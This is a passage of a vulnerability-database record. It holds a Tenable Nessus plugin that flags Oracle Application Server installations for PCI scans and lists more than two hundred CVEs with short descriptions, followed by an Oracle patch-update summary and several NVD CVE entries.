"ORACLE_APPLICATION_SERVER_PCI.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57619", "title": "Oracle Application Server Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57619);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n\n script_cve_id(\n \"CVE-2000-0169\",\n \"CVE-2000-1235\",\n \"CVE-2000-1236\",\n \"CVE-2001-0326\",\n \"CVE-2001-0419\",\n \"CVE-2001-0591\",\n \"CVE-2001-1216\",\n \"CVE-2001-1217\",\n \"CVE-2001-1371\",\n \"CVE-2001-1372\",\n \"CVE-2002-0386\",\n \"CVE-2002-0559\",\n \"CVE-2002-0560\",\n \"CVE-2002-0561\",\n \"CVE-2002-0562\",\n \"CVE-2002-0563\",\n \"CVE-2002-0564\",\n \"CVE-2002-0565\",\n \"CVE-2002-0566\",\n \"CVE-2002-0568\",\n \"CVE-2002-0569\",\n \"CVE-2002-0655\",\n \"CVE-2002-0656\",\n \"CVE-2002-0659\",\n \"CVE-2002-0840\",\n \"CVE-2002-0842\",\n \"CVE-2002-0843\",\n \"CVE-2002-0947\",\n \"CVE-2002-1089\",\n \"CVE-2002-1630\",\n \"CVE-2002-1631\",\n \"CVE-2002-1632\",\n \"CVE-2002-1635\",\n \"CVE-2002-1636\",\n \"CVE-2002-1637\",\n \"CVE-2002-1858\",\n \"CVE-2002-2153\",\n \"CVE-2002-2345\",\n \"CVE-2002-2347\",\n \"CVE-2004-1362\",\n \"CVE-2004-1363\",\n \"CVE-2004-1364\",\n \"CVE-2004-1365\",\n \"CVE-2004-1366\",\n \"CVE-2004-1367\",\n \"CVE-2004-1368\",\n \"CVE-2004-1369\",\n \"CVE-2004-1370\",\n \"CVE-2004-1371\",\n \"CVE-2004-1707\",\n \"CVE-2004-1774\",\n \"CVE-2004-1877\",\n \"CVE-2004-2134\",\n \"CVE-2004-2244\",\n \"CVE-2005-1383\",\n \"CVE-2005-1495\",\n \"CVE-2005-1496\",\n \"CVE-2005-2093\",\n \"CVE-2005-3204\",\n \"CVE-2005-3445\",\n \"CVE-2005-3446\",\n \"CVE-2005-3447\",\n \"CVE-2005-3448\",\n \"CVE-2005-3449\",\n \"CVE-2005-3450\",\n \"CVE-2005-3451\",\n \"CVE-2005-3452\",\n \"CVE-2005-3453\",\n \"CVE-2006-0273\",\n \"CVE-2006-0274\",\n \"CVE-2006-0275\",\n \"CVE-2006-0282\",\n \"CVE-2006-0283\",\n \"CVE-2006-0284\",\n \"CVE-2006-0285\",\n \"CVE-2006-0286\",\n \"CVE-2006-0287\",\n \"CVE-2006-0288\",\n \"CVE-2006-0289\",\n \"CVE-2006-0290\",\n \"CVE-2006-0291\",\n \"CVE-2006-0435\",\n \"CVE-2006-0552\",\n \"CVE-2006-0586\",\n \"CVE-2006-1884\",\n \"CVE-2006-3706\",\n \"CVE-2006-3707\",\n \"CVE-2006-3708\",\n \"CVE-2006-3709\",\n \"CVE-2006-3710\",\n \"CVE-2006-3711\",\n \"CVE-2006-3712\",\n \"CVE-2006-3713\",\n \"CVE-2006-3714\",\n \"CVE-2006-5353\",\n \"CVE-2006-5354\",\n \"CVE-2006-5355\",\n \"CVE-2006-5356\",\n \"CVE-2006-5357\",\n \"CVE-2006-5358\",\n \"CVE-2006-5359\",\n \"CVE-2006-5360\",\n \"CVE-2006-5361\",\n \"CVE-2006-5362\",\n \"CVE-2006-5363\",\n \"CVE-2006-5364\",\n \"CVE-2006-5365\",\n \"CVE-2006-5366\",\n \"CVE-2007-0222\",\n \"CVE-2007-0275\",\n \"CVE-2007-0280\",\n \"CVE-2007-0281\",\n \"CVE-2007-0282\",\n \"CVE-2007-0283\",\n \"CVE-2007-0284\",\n \"CVE-2007-0285\",\n \"CVE-2007-0286\",\n \"CVE-2007-0287\",\n \"CVE-2007-0288\",\n \"CVE-2007-0289\",\n \"CVE-2007-1359\",\n \"CVE-2007-1609\",\n \"CVE-2007-2119\",\n \"CVE-2007-2120\",\n \"CVE-2007-2121\",\n \"CVE-2007-2122\",\n \"CVE-2007-2123\",\n \"CVE-2007-2124\",\n \"CVE-2007-2130\",\n \"CVE-2007-3553\",\n \"CVE-2007-3854\",\n \"CVE-2007-3859\",\n \"CVE-2007-3861\",\n \"CVE-2007-3862\",\n \"CVE-2007-3863\",\n \"CVE-2007-5516\",\n \"CVE-2007-5517\",\n \"CVE-2007-5518\",\n \"CVE-2007-5519\",\n \"CVE-2007-5520\",\n \"CVE-2007-5521\",\n \"CVE-2007-5522\",\n \"CVE-2007-5523\",\n \"CVE-2007-5524\",\n \"CVE-2007-5525\",\n \"CVE-2007-5526\",\n \"CVE-2007-5531\",\n \"CVE-2008-0340\",\n \"CVE-2008-0343\",\n \"CVE-2008-0344\",\n \"CVE-2008-0345\",\n \"CVE-2008-0346\",\n \"CVE-2008-0347\",\n \"CVE-2008-0348\",\n \"CVE-2008-0349\",\n \"CVE-2008-1812\",\n \"CVE-2008-1814\",\n \"CVE-2008-1823\",\n \"CVE-2008-1824\",\n \"CVE-2008-1825\",\n \"CVE-2008-2583\",\n \"CVE-2008-2588\",\n \"CVE-2008-2589\",\n \"CVE-2008-2593\",\n \"CVE-2008-2594\",\n \"CVE-2008-2595\",\n \"CVE-2008-2609\",\n \"CVE-2008-2612\",\n \"CVE-2008-2614\",\n \"CVE-2008-2619\",\n \"CVE-2008-2623\",\n \"CVE-2008-3975\",\n \"CVE-2008-3977\",\n \"CVE-2008-3986\",\n \"CVE-2008-3987\",\n \"CVE-2008-4014\",\n \"CVE-2008-4017\",\n \"CVE-2008-5438\",\n \"CVE-2008-7233\",\n \"CVE-2009-0217\",\n \"CVE-2009-0989\",\n \"CVE-2009-0990\",\n \"CVE-2009-0994\",\n \"CVE-2009-1008\",\n \"CVE-2009-1009\",\n \"CVE-2009-1010\",\n \"CVE-2009-1011\",\n \"CVE-2009-1017\",\n \"CVE-2009-1976\",\n \"CVE-2009-1990\",\n \"CVE-2009-1999\",\n \"CVE-2009-3407\",\n \"CVE-2009-3412\",\n \"CVE-2010-0066\",\n \"CVE-2010-0067\",\n \"CVE-2010-0070\",\n \"CVE-2011-0789\",\n \"CVE-2011-0795\",\n \"CVE-2011-0884\",\n \"CVE-2011-2237\",\n \"CVE-2011-2314\",\n \"CVE-2011-3523\"\n );\n\n script_bugtraq_id(\n 1053,\n 2150,\n 2286,\n 2569,\n 3341,\n 3726,\n 3727,\n 4032,\n 4034,\n 4037,\n 4289,\n 4290,\n 4292,\n 4293,\n 4294,\n 4298,\n 4844,\n 4848,\n 5119,\n 5262,\n 5362,\n 5363,\n 5364,\n 5366,\n 5452,\n 5847,\n 5887,\n 5902,\n 5995,\n 5996,\n 6556,\n 6846,\n 7395,\n 9515,\n 9703,\n 10009,\n 10829,\n 10871,\n 13145,\n 13418,\n 13509,\n 15034,\n 15134,\n 16287,\n 16294,\n 16384,\n 17590,\n 19054,\n 20588,\n 22027,\n 22083,\n 22831,\n 23102,\n 23532,\n 24697,\n 27229,\n 33177,\n 34461,\n 35671,\n 35688,\n 36746,\n 36749,\n 36753,\n 50202,\n 50209\n );\n\n\n script_name(english:\"Oracle Application Server Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server may be affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Oracle Application Server. It was not possible\nto determine its version, so the version of Oracle Application Server\ninstalled on the remote host could potentially be affected by multiple\nvulnerabilities :\n\n - CVE-2000-0169: Remote command execution in the web\n listener component.\n\n - CVE-2000-1235: Information disclosure in the port\n listener component and modplsql.\n\n - CVE-2000-1236: SQL injection in mod_sql.\n\n - CVE-2001-0326: Information disclosure in the Java\n Virtual Machine.\n\n - CVE-2001-0419: Buffer overflow in ndwfn4.so.\n\n - CVE-2001-0591: Directory traversal.\n\n - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.\n\n - CVE-2001-1217: Directory traversal vulnerability in the\n PL/SQL Apache module.\n\n - CVE-2001-1371: Improper access control in the SOAP\n service.\n\n - CVE-2001-1372: Information disclosure.\n\n - CVE-2002-0386: Denial of service through the\n administration module for Oracle Web Cache.\n\n - CVE-2002-0559: Buffer overflows in the PL/SQL module.\n\n - CVE-2002-0560: Information disclosure in the PL/SQL\n module.\n\n - CVE-2002-0561: Authentication bypass in the PL/SQL\n Gateway web administration interface.\n\n - CVE-2002-0562: Information disclosure through\n globals.jsa.\n\n - CVE-2002-0563: Improper access control on several\n services.\n\n - CVE-2002-0564: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2002-0565: Information disclosure through JSP files\n in the _pages directory.\n\n - CVE-2002-0566: Denial of service in the PL/SQL module.\n\n - CVE-2002-0568: Improper access control on XSQLConfig.xml\n and soapConfig.xml.\n\n - CVE-2002-0569: Authentication bypass through\n XSQLServlet.\n\n - CVE-2002-0655: Denial of service in OpenSSL.\n\n - CVE-2002-0656: Buffer overflows in OpenSSL.\n\n - CVE-2002-0659: Denial of service in OpenSSL.\n\n - CVE-2002-0840: Cross-site scripting in the default error\n page of Apache.\n\n - CVE-2002-0842: Format string vulnerability in mod_dav.\n\n - CVE-2002-0843: Buffer overflows in ApacheBench.\n\n - CVE-2002-0947: Buffer overflow in rwcgi60.\n\n - CVE-2002-1089: Information disclosure in rwcgi60.\n\n - CVE-2002-1630: Improper access control on sendmail.jsp.\n\n - CVE-2002-1631: SQL injection in query.xsql.\n\n - CVE-2002-1632: Information disclosure through several\n JSP pages.\n\n - CVE-2002-1635: Information disclosure in Apache.\n\n - CVE-2002-1636: Cross-site scripting in the htp PL/SQL\n package.\n\n - CVE-2002-1637: Default credentials in multiple\n components.\n\n - CVE-2002-1858: Information disclosure through the\n WEB-INF directory.\n\n - CVE-2002-2153: Format string vulnerability in the\n administrative pages of the PL/SQL module.\n\n - CVE-2002-2345: Credential leakage in the web cache\n administrator interface.\n\n - CVE-2002-2347: Cross-site scripting in several JSP\n pages.\n\n - CVE-2004-1362: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2004-1363: Buffer overflow in extproc.\n\n - CVE-2004-1364: Directory traversal in extproc.\n\n - CVE-2004-1365: Command execution in extproc.\n\n - CVE-2004-1366: Improper access control on\n emoms.properties.\n\n - CVE-2004-1367: Credential leakage in Database Server.\n\n - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.\n\n - CVE-2004-1369: Denial of service in TNS Listener.\n\n - CVE-2004-1370: Multiple SQL injection vulnerabilities in\n PL/SQL.\n\n - CVE-2004-1371: Stack-based buffer overflow.\n\n - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.\n\n - CVE-2004-1774: Buffer overflow in the MD2 package.\n\n - CVE-2004-1877: Phishing vulnerability in Single Sign-On\n component.\n\n - CVE-2004-2134: Weak cryptography for passwords in the\n toplink mapping workBench.\n\n - CVE-2004-2244: Denial of service in the XML parser.\n\n - CVE-2005-1383: Authentication bypass in HTTP Server.\n\n - CVE-2005-1495: Detection bypass.\n\n - CVE-2005-1496: Privilege escalation in the\n DBMS_Scheduler.\n\n - CVE-2005-2093: Web cache poisoning.\n\n - CVE-2005-3204: Cross-site scripting.\n\n - CVE-2005-3445: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2005-3446: Unspecified vulnerability in Internet\n Directory.\n\n - CVE-2005-3447: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2005-3448: Unspecified vulnerability in the OC4J\n module.\n\n - CVE-2005-3449: Multiple unspecified vulnerabilities in\n multiple components.\n\n - CVE-2005-3450: Unspecified vulnerability in HTTP Server.\n\n - CVE-2005-3451: Unspecified vulnerability in\n SQL*ReportWriter.\n\n - CVE-2005-3452: Unspecified vulnerability in Web Cache.\n\n - CVE-2005-3453: Multiple unspecified vulnerabilities in\n Web Cache.\n\n - CVE-2006-0273: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2006-0274: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0275: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0282: Unspecified vulnerability.\n\n - CVE-2006-0283: Unspecified vulnerability.\n\n - CVE-2006-0284: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0285: Unspecified vulnerability in the Java Net\n component.\n\n - CVE-2006-0286: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0287: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0288: Multiple unspecified vulnerabilities in\n the Oracle Reports Developer component.\n\n - CVE-2006-0289: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0290: Unspecified vulnerability in the Oracle\n Workflow Cartridge component.\n\n - CVE-2006-0291: Multiple unspecified vulnerabilities in\n the Oracle Workflow Cartridge component.\n\n - CVE-2006-0435: Unspecified vulnerability in Oracle\n PL/SQL.\n\n - CVE-2006-0552: Unspecified vulnerability in the Net\n Listener component.\n\n - CVE-2006-0586: Multiple SQL injection vulnerabilities.\n\n - CVE-2006-1884: Unspecified vulnerability in the Oracle\n Thesaurus Management System component.\n\n - CVE-2006-3706: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3707: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3708: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3709: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3710: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3711: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3712: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3713: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3714: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5353: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5354: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5355: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5356: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5357: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5358: Unspecified vulnerability in the Oracle\n Forms component.\n\n - CVE-2006-5359: Multiple unspecified vulnerabilities in\n Oracle Reports Developer component.\n\n - CVE-2006-5360: Unspecified vulnerability in Oracle Forms\n component.\n\n - CVE-2006-5361: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5362: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5363: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5364: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5365: Unspecified vulnerability in Oracle\n Forms.\n\n - CVE-2006-5366: Multiple unspecified vulnerabilities.\n\n - CVE-2007-0222: Directory traversal vulnerability in\n EmChartBean.\n\n - CVE-2007-0275: Cross-site scripting vulnerability in\n Oracle Reports Web Cartridge (RWCGI60).\n\n - CVE-2007-0280: Buffer overflow in Oracle Notification\n Service.\n\n - CVE-2007-0281: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2007-0282: Unspecified vulnerability in OPMN02.\n\n - CVE-2007-0283: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0284: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-0285: Unspecified vulnerability in Oracle\n Reports Developer.\n\n - CVE-2007-0286: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0287: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0288: Unspecified vulnerability in Oracle\n Internet Directory.\n\n - CVE-2007-0289: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-1359: Improper access control in mod_security.\n\n - CVE-2007-1609: Cross-site scripting vulnerability in\n servlet/Spy in Dynamic Monitoring Services (DMS).\n\n - CVE-2007-2119: Cross-site scripting vulnerability in the\n Administration Front End for Oracle Enterprise (Ultra)\n Search.\n\n - CVE-2007-2120: Denial of service in the Oracle\n Discoverer servlet.\n\n - CVE-2007-2121: Unspecified vulnerability in the COREid\n Access component.\n\n - CVE-2007-2122: Unspecified vulnerability in the Wireless\n component.\n\n - CVE-2007-2123: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2124: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2130: Unspecified vulnerability in Workflow\n Cartridge.\n\n - CVE-2007-3553: Cross-site scripting vulnerability in\n Rapid Install Web Server.\n\n - CVE-2007-3854: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and the Spatial\n component.\n\n - CVE-2007-3859: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-3861: Unspecified vulnerability in Oracle\n Jdeveloper.\n\n - CVE-2007-3862: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-3863: Unspecified vulnerability in Oracle\n JDeveloper.\n\n - CVE-2007-5516: Unspecified vulnerability in the Oracle\n Process Mgmt & Notification component.\n\n - CVE-2007-5517: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5518: Unspecified vulnerability in HTTP Server.\n\n - CVE-2007-5519: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5520: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5521: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-5522: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5523: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5524: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5525: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5526: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5531: Unspecified vulnerability in Oracle Help\n for Web.\n\n - CVE-2008-0340: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and Spatial component.\n\n - CVE-2008-0343: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0344: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0345: Unspecified vulnerability in the Core\n RDBMS component.\n\n - CVE-2008-0346: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-0347: Unspecified vulnerability in the Oracle\n Ultra Search component.\n\n - CVE-2008-0348: Multiple unspecified vulnerabilities in\n the PeopleTools component.\n\n - CVE-2008-0349: Unspecified vulnerability in the\n PeopleTools component.\n\n - CVE-2008-1812: Unspecified vulnerability in the Oracle\n Enterprise Manager component.\n\n - CVE-2008-1814: Unspecified vulnerability in the Oracle\n Secure Enterprise Search or Ultrasearch component.\n\n - CVE-2008-1823: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-1824: Unspecified vulnerability in the Oracle\n Dynamic Monitoring Service component.\n\n - CVE-2008-1825: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2583: Unspecified vulnerability in the sample\n Discussion Forum Portlet for the Oracle Portal\n component.\n\n - CVE-2008-2588: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-2589: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2593: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2594: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2595: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2008-2609: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2612: Unspecified vulnerability in the Hyperion\n BI Plus component.\n\n - CVE-2008-2614: Unspecified vulnerability in HTTP Server.\n\n - CVE-2008-2619: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2008-2623: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-3975: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3977: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3986: Unspecified vulnerability in the Oracle\n Discoverer Administrator component.\n\n - CVE-2008-3987: Unspecified vulnerability in the Oracle\n Discoverer Desktop component.\n\n - CVE-2008-4014: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2008-4017: Unspecified vulnerability in the OC4J\n component.\n\n - CVE-2008-5438: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-7233: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2009-0217: Signature spoofing vulnerability in\n multiple components.\n\n - CVE-2009-0989: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0990: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0994: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1008: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1009: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1010: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1011: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1017: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1976: Unspecified vulnerability in HTTP Server.\n\n - CVE-2009-1990: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-1999: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-3407: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2009-3412: Unspecified vulnerability in the Unzip\n component.\n\n - CVE-2010-0066: Unspecified vulnerability in the Access\n Manager Identity Server component.\n\n - CVE-2010-0067: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2010-0070: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-0789: Unspecified vulnerability in HTTP Server.\n\n - CVE-2011-0795: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2011-0884: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2011-2237: Unspecified vulnerability in the Oracle\n Web Services Manager component.\n\n - CVE-2011-2314: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-3523: Unspecified vulnerability in the Oracle\n Web Services Manager component.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Verify that the version of Oracle Application Server installed is not\naffected by the listed vulnerabilities and/or filter incoming traffic to this port\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-053\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Oracle Secure Backup 10.2.0.2 RCE (Windows)\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 200, 255, 264, 287);\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service2.nasl\");\n script_require_keys(\"Settings/PCI_DSS\");\n script_require_ports(\"Services/oracle_application_server\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\n# Only PCI considers this an issue.\nif (!get_kb_item(\"Settings/PCI_DSS\")) exit(0, \"PCI-DSS compliance checking is not enabled.\");\n\n# Make sure this is Oracle.\nport = get_kb_item_or_exit(\"Services/oracle_application_server\");\n\n# We're flagging every installation of Oracle Application Server, with\n# every vulnerability it has ever had.\nsecurity_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2018-08-31T04:13:38", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible.** This Critical Patch Update contains 43 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2009-04-14T00:00:00", "id": "ORACLE:CPUAPR2009-099563", "href": "", "title": "cpuapr2009.html", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2018-10-11T11:33:52", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Advanced Queuing component in Oracle Database 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote authenticated users to affect confidentiality and integrity, related to DBMS_AQIN. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on reliable researcher claims that this issue is SQL injection in the DEQ_EXEJOB procedure.", "modified": "2018-10-10T15:32:42", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0992", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0992", "title": "CVE-2009-0992", "type": "cve", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-18T15:52:30", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2009-0983 and CVE-2009-3407.", "modified": "2016-11-28T14:07:04", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0974", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0974", "title": "CVE-2009-0974", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T12:12:45", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Resource Manager component in Oracle Database 9.2.0.8 and 9.2.0.8DV allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.", "modified": "2012-10-22T23:04:24", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0979", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0979", "type": "cve", "title": "CVE-2009-0979", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T12:12:50", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Core RDBMS component in Oracle Database 10.1.0.5, 10.2.0.4, and 11.1.0.6 allows remote authenticated users with the IMP_FULL_DATABASE role to affect confidentiality, integrity, and availability.", "modified": "2012-10-22T23:04:25", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0985", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0985", "type": "cve", "title": "CVE-2009-0985", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-18T15:52:30", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Workspace Manager component in Oracle Database 10.2.0.4 and 11.1.0.6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-0978.", "modified": "2016-11-22T11:13:19", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0975", "title": "CVE-2009-0975", "type": "cve", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-18T15:52:31", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.19 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-1013.", "modified": "2016-11-23T14:40:14", "published": "2009-04-15T06:30:01", "id": "CVE-2009-1014", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1014", "title": "CVE-2009-1014", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, 